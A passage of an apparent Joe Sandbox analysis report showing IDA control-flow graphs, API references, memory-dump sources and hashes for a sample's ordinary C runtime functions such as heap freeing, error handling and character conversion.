                                                                                                                                                                                • _free.LIBCMT ref: 00F5660F
                                                                                                                                                                                • _free.LIBCMT ref: 00F5662C
                                                                                                                                                                                • _free.LIBCMT ref: 00F56644
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                 • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                 • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                 • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                 • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 161543041-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00F54344
                                                                                                                                                                                  • Part of subcall function 00F54869: HeapFree.KERNEL32(00000000,00000000,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?), ref: 00F5487F
                                                                                                                                                                                  • Part of subcall function 00F54869: GetLastError.KERNEL32(?,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?,?), ref: 00F54891
                                                                                                                                                                                • _free.LIBCMT ref: 00F54350
                                                                                                                                                                                • _free.LIBCMT ref: 00F5435B
                                                                                                                                                                                • _free.LIBCMT ref: 00F54366
                                                                                                                                                                                • _free.LIBCMT ref: 00F54371
                                                                                                                                                                                • _free.LIBCMT ref: 00F5437C
                                                                                                                                                                                • _free.LIBCMT ref: 00F54387
                                                                                                                                                                                • _free.LIBCMT ref: 00F54392
                                                                                                                                                                                • _free.LIBCMT ref: 00F5439D
                                                                                                                                                                                • _free.LIBCMT ref: 00F543AB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                 • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                 • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                 • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                 • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00F554C8,00000000,?,?,?,00F57D05,?,?,00000100), ref: 00F57B0E
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00F57B46
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00F57D05,?,?,00000100,5EFC4D8B,?,?), ref: 00F57B94
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00F57C2B
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F57C8E
                                                                                                                                                                                • __freea.LIBCMT ref: 00F57C9B
                                                                                                                                                                                  • Part of subcall function 00F562FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F57E5B,?,00000000,?,00F5686F,?,00000004,00000000,?,?,?,00F53BCD), ref: 00F56331
                                                                                                                                                                                • __freea.LIBCMT ref: 00F57CA4
                                                                                                                                                                                • __freea.LIBCMT ref: 00F57CC9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                 • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                 • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                 • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                 • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2597970681-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00F58B8C,?,00000000,?,00000000,00000000), ref: 00F58459
                                                                                                                                                                                • __fassign.LIBCMT ref: 00F584D4
                                                                                                                                                                                • __fassign.LIBCMT ref: 00F584EF
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00F58515
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,00F58B8C,00000000,?,?,?,?,?,?,?,?,?,00F58B8C,?), ref: 00F58534
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,00F58B8C,00000000,?,?,?,?,?,?,?,?,?,00F58B8C,?), ref: 00F5856D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1324828854-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 259 f51e00-f51e51 call f5ac80 call f51dc0 call f52377 266 f51e53-f51e65 259->266 267 f51ead-f51eb0 259->267 268 f51ed0-f51ed9 266->268 270 f51e67-f51e7e 266->270 267->268 269 f51eb2-f51ebf call f52360 267->269 275 f51ec4-f51ecd call f51dc0 269->275 272 f51e94 270->272 273 f51e80-f51e8e call f52300 270->273 274 f51e97-f51e9c 272->274 282 f51ea4-f51eab 273->282 283 f51e90 273->283 274->270 277 f51e9e-f51ea0 274->277 275->268 277->268 280 f51ea2 277->280 280->275 282->275 284 f51e92 283->284 285 f51eda-f51ee3 283->285 284->274 286 f51ee5-f51eec 285->286 287 f51f1d-f51f2d call f52340 285->287 286->287 289 f51eee-f51efd call f5aac0 286->289 293 f51f41-f51f5d call f51dc0 call f52320 287->293 294 f51f2f-f51f3e call f52360 287->294 295 f51eff-f51f17 289->295 296 f51f1a 289->296 294->293 295->296 296->287
                                                                                                                                                                                APIs
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00F51E37
                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00F51E3F
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00F51EC8
                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00F51EF3
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00F51F48
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 1170836740-1018135373

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 305 f5621b-f56226 306 f562fc-f562fe 305->306 307 f5622c-f562f9 call f561df * 5 call f54869 * 3 call f561df * 5 call f54869 * 4 305->307 307->306
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00F561DF: _free.LIBCMT ref: 00F56208
                                                                                                                                                                                • _free.LIBCMT ref: 00F56269
                                                                                                                                                                                  • Part of subcall function 00F54869: HeapFree.KERNEL32(00000000,00000000,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?), ref: 00F5487F
                                                                                                                                                                                  • Part of subcall function 00F54869: GetLastError.KERNEL32(?,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?,?), ref: 00F54891
                                                                                                                                                                                • _free.LIBCMT ref: 00F56274
                                                                                                                                                                                • _free.LIBCMT ref: 00F5627F
                                                                                                                                                                                • _free.LIBCMT ref: 00F562D3
                                                                                                                                                                                • _free.LIBCMT ref: 00F562DE
                                                                                                                                                                                • _free.LIBCMT ref: 00F562E9
                                                                                                                                                                                • _free.LIBCMT ref: 00F562F4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 342 f523d1-f523d8 343 f523dd-f523f8 GetLastError call f526a4 342->343 344 f523da-f523dc 342->344 347 f52411-f52413 343->347 348 f523fa-f523fc 343->348 349 f52457-f52462 SetLastError 347->349 348->349 350 f523fe-f5240f call f526df 348->350 350->347 353 f52415-f52425 call f53f67 350->353 356 f52427-f52437 call f526df 353->356 357 f52439-f52449 call f526df 353->357 356->357 363 f5244b-f5244d 356->363 362 f5244f-f52456 call f53ec5 357->362 362->349 363->362
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00F523C8,00F5209F,00F51AFC), ref: 00F523DF
                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F523ED
                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F52406
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00F523C8,00F5209F,00F51AFC), ref: 00F52458
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3852720340-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 366 f54424-f54438 GetLastError 367 f54446-f5444b 366->367 368 f5443a-f54444 call f55904 366->368 369 f5444d call f5480c 367->369 368->367 375 f5448f-f5449a SetLastError 368->375 371 f54452-f54458 369->371 373 f54463-f54471 call f5595a 371->373 374 f5445a 371->374 381 f54476-f5448d call f54296 call f54869 373->381 382 f54473-f54474 373->382 376 f5445b-f54461 call f54869 374->376 383 f5449b-f544a7 SetLastError call f53f24 376->383 381->375 381->383 382->376
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(00000008,?,00F56D69,?,?,?,00F604C8,0000002C,00F53F34,00000016,00F5209F,00F51AFC), ref: 00F54428
                                                                                                                                                                                • _free.LIBCMT ref: 00F5445B
                                                                                                                                                                                • _free.LIBCMT ref: 00F54483
                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00F54490
                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00F5449C
                                                                                                                                                                                • _abort.LIBCMT ref: 00F544A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3160817290-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 390 f536fc-f53724 GetModuleHandleExW 391 f53726-f53739 GetProcAddress 390->391 392 f53749-f5374d 390->392 395 f53748 391->395 396 f5373b-f53746 391->396 393 f5374f-f53752 FreeLibrary 392->393 394 f53758-f53765 call f5123a 392->394 393->394 395->392 396->395
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F536AD,?,?,00F5364D,?,00F602E0,0000000C,00F537A4,?,00000002), ref: 00F5371C
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F5372F
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00F536AD,?,?,00F5364D,?,00F602E0,0000000C,00F537A4,?,00000002,00000000), ref: 00F53752
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                • Opcode ID: 5f3838dbf72665493cdb641223783e9a3f6b5511fa1b1e87fbb03d5b9a741cc4
                                                                                                                                                                                • Instruction ID: 9839ee986b28259b0084f6bd688a07909e9993bf5ad8740d2f361644aa93360d
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f3838dbf72665493cdb641223783e9a3f6b5511fa1b1e87fbb03d5b9a741cc4
                                                                                                                                                                                • Instruction Fuzzy Hash: 7EF03C71A0420CBBCB119B94EC49BAEBFB4EF08753F044064EE05A2190DB709A48EA90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 400 f5634d-f56372 call f53f72 403 f56374-f5637c 400->403 404 f5637f-f563a5 MultiByteToWideChar 400->404 403->404 405 f56444-f56448 404->405 406 f563ab-f563b7 404->406 409 f56454-f56469 call f5123a 405->409 410 f5644a-f5644d 405->410 407 f56403 406->407 408 f563b9-f563ca 406->408 411 f56405-f56407 407->411 412 f563e5-f563eb 408->412 413 f563cc-f563db call f5ac20 408->413 410->409 415 f5643d-f56443 call f5646a 411->415 416 f56409-f5642b call f520b0 MultiByteToWideChar 411->416 418 f563ec call f562ff 412->418 413->415 427 f563dd-f563e3 413->427 415->405 416->415 429 f5642d-f5643b GetStringTypeW 416->429 423 f563f1-f563f6 418->423 423->415 424 f563f8 423->424 428 f563fe-f56401 424->428 427->428 428->411 429->415
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00F554C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00F5639A
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00F563D2
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F56423
                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F56435
                                                                                                                                                                                • __freea.LIBCMT ref: 00F5643E
                                                                                                                                                                                  • Part of subcall function 00F562FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F57E5B,?,00000000,?,00F5686F,?,00000004,00000000,?,?,?,00F53BCD), ref: 00F56331
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1857427562-0
                                                                                                                                                                                • Opcode ID: 79c0fceee8ce62a698d1eb8b97a9430eb53c0f67362aa1ed26dfeadfb96e6b16
                                                                                                                                                                                • Instruction ID: 76147189e6933c4a4e90226a16ac523c3087971f8fd1adb69e98fe467f572e26
                                                                                                                                                                                • Opcode Fuzzy Hash: 79c0fceee8ce62a698d1eb8b97a9430eb53c0f67362aa1ed26dfeadfb96e6b16
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B31E372A0020AABDF25DF64DC45DAE7BA5EF00322F444128FD24D7250E735CD59EBA0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 430 f5561e-f55633 GetEnvironmentStringsW 431 f55635-f55655 call f555e7 WideCharToMultiByte 430->431 432 f5568b 430->432 431->432 438 f55657 431->438 433 f5568d-f5568f 432->433 435 f55691-f55692 FreeEnvironmentStringsW 433->435 436 f55698-f556a0 433->436 435->436 439 f55658 call f562ff 438->439 440 f5565d-f55662 439->440 441 f55664-f55678 WideCharToMultiByte 440->441 442 f55680 440->442 441->442 443 f5567a-f5567e 441->443 444 f55682-f55689 call f54869 442->444 443->444 444->433
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00F55627
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5564A
                                                                                                                                                                                  • Part of subcall function 00F562FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F57E5B,?,00000000,?,00F5686F,?,00000004,00000000,?,?,?,00F53BCD), ref: 00F56331
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F55670
                                                                                                                                                                                • _free.LIBCMT ref: 00F55683
                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F55692
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2278895681-0
                                                                                                                                                                                • Opcode ID: 30bb2942c62dee4a813fd33d329b11c139718e1564da1d4c7c6dd3a2a131595c
                                                                                                                                                                                • Instruction ID: 6f1570187b7deb14da9ee7bab34f141edb17c9de7170f05fc5046ad879e4bcac
                                                                                                                                                                                • Opcode Fuzzy Hash: 30bb2942c62dee4a813fd33d329b11c139718e1564da1d4c7c6dd3a2a131595c
                                                                                                                                                                                • Instruction Fuzzy Hash: 1501B172A01A997F27211AB65C6CC7B7AADDEC2FB33560129FF14CB140EB608C05A1B0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 447 f544a8-f544bf GetLastError 448 f544c1-f544cb call f55904 447->448 449 f544cd-f544d2 447->449 448->449 454 f5451e-f54525 SetLastError 448->454 451 f544d4 call f5480c 449->451 453 f544d9-f544df 451->453 455 f544e1 453->455 456 f544ea-f544f8 call f5595a 453->456 458 f54527-f5452c 454->458 459 f544e2-f544e8 call f54869 455->459 463 f544fd-f54513 call f54296 call f54869 456->463 464 f544fa-f544fb 456->464 465 f54515-f5451c SetLastError 459->465 463->454 463->465 464->459 465->458
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00F547FE,00F57E79,?,00F5686F,?,00000004,00000000,?,?,?,00F53BCD,?,00000000), ref: 00F544AD
                                                                                                                                                                                • _free.LIBCMT ref: 00F544E2
                                                                                                                                                                                • _free.LIBCMT ref: 00F54509
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F54516
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F5451F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                • Opcode ID: 99712e1f825c8d91360618ae0812bba03f40f4a47288c4200e5c274e30e91319
                                                                                                                                                                                • Instruction ID: 41bf6ddcd752e1abcc1c1828036d8ab8a0c7477f2ae3dbb8fecf116e57155adf
                                                                                                                                                                                • Opcode Fuzzy Hash: 99712e1f825c8d91360618ae0812bba03f40f4a47288c4200e5c274e30e91319
                                                                                                                                                                                • Instruction Fuzzy Hash: F7014432644604AB8212A6302C45F2B366EBBC177FB280024FF29D21C2FF68AC8D7021

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 470 f56176-f56181 471 f56183-f5618b 470->471 472 f561dc-f561de 470->472 473 f56194-f5619d 471->473 474 f5618d-f56193 call f54869 471->474 476 f561a6-f561af 473->476 477 f5619f-f561a5 call f54869 473->477 474->473 480 f561b1-f561b7 call f54869 476->480 481 f561b8-f561c1 476->481 477->476 480->481 484 f561c3-f561c9 call f54869 481->484 485 f561ca-f561d3 481->485 484->485 485->472 486 f561d5-f561db call f54869 485->486 486->472
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00F5618E
                                                                                                                                                                                  • Part of subcall function 00F54869: HeapFree.KERNEL32(00000000,00000000,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?), ref: 00F5487F
                                                                                                                                                                                  • Part of subcall function 00F54869: GetLastError.KERNEL32(?,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?,?), ref: 00F54891
                                                                                                                                                                                • _free.LIBCMT ref: 00F561A0
                                                                                                                                                                                • _free.LIBCMT ref: 00F561B2
                                                                                                                                                                                • _free.LIBCMT ref: 00F561C4
                                                                                                                                                                                • _free.LIBCMT ref: 00F561D6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 618c4d2d77783c8977bf7bf926b926e26ea57c49b7ab08877ad00f4388626e12
                                                                                                                                                                                • Instruction ID: b53a97920d771a02eff2d148c20866c6be9f3542a07aae3a0bade84d46aa5d3b
